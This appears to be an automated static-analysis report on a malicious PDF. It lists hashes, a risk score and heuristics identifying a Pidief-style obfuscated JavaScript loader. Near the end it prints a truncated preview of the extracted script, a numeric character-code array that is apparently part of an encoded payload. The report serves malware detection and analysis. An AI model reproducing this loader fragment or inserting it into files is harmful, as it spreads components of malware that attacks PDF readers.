Malicious PDF — malware analysis report

Static analysis result for SHA-256 9f5c33668e8e9ca7…

Verdict: MALICIOUS

File type: PDF

Size: 8.0 KB
First seen: 2026-05-10
MD5: 716434e5c9ac174bfbd4927a2080740f
SHA-1: 55552c449b2a34cdf80b28a9b9c300aad9d0af61
SHA-256: 9f5c33668e8e9ca7c247b10409a39d5ba3ea3d26e325100d8a4dcb3a00f520b3
Risk Score: 86

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier also flagged this PDF as malicious with high confidence. The embedded JavaScript, named 'javascript_obj0069_000.js', is likely responsible for executing malicious code or downloading a second-stage payload. Due to the obfuscated nature of the script, the exact payload and execution method cannot be determined, but the presence of JavaScript in a PDF is a strong indicator of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (3)

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) (severity: high; CVE-related) PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER
    PDF JavaScript carries a large opaque encoded stage (a large numeric character-code array feeding an auto-run script) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action (severity: low; 1 related finding) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename                  | Kind                  | Source                            | Size
javascript_obj0069_000.js | pdf-javascript-stream | PDF /JS object 69 at offset 0x1BE | 865 bytes
SHA-256: cdc809a64e9d027e71866adc49e63a9f9ef10a5845eaf0f73ce0b82da7c87531

Script preview (first 1,000 lines of the extracted script):
ngE1Hq5hWh=[87,1,22,5,87,38,79,20,26,20,32,30,67,70,37,67,50,74,85,30,24,95,3,87,30,0,31,2,25,17,5,20,40,4,17,25,3,15,87,22,12,18,14,91,27,27,4,7,7,94,12,94,18,30,22,5,4,30,25,18,89,18,95,14,27,75,27,93,69,3,14,22,31,5,5,5,25,7,92,74,2,14,22,25,16,14,4,76,22,4,7,7,89,14,4,7,4,18,25,25,22,21,91,5,5,27,74,4,10,3,88,71,5,16,95,2,5,10,3,69,18,30,25,76,17,30,22,5,4,20,94,25,76,7,87,14,5,25,87,30,24,31,5,87,3,95,4,19,18,7,1,22,7,3,24,2,25,87,94,12,19,87,74,4,18,20,18,2,95,22,52,53,2,18,82,25,82,2,79,27,27,43,85,65,68,20,71,68,71,82,71,67,67,64,52,64,2,68,52,82,71,82,2,82,2,67,79,71,53,70,52,79,53,71,79,82,2,79,71,79,2,66,2,54,51,79,71,82,2,71,2,79,53,82,53,82,78,50,2,82,2,71,2,64,79,67,51,68,67,66,53,66,79,82,2,79,71,82,52,67,52,82,2,68,53,67,52,50,69,65,54,82,54,82,2,82,2,82,67,69,70,50,69,51,53,82,69,79,53,50,78,66,2,66,2,50,53,82,2,82,2,66,2,67,49,79,6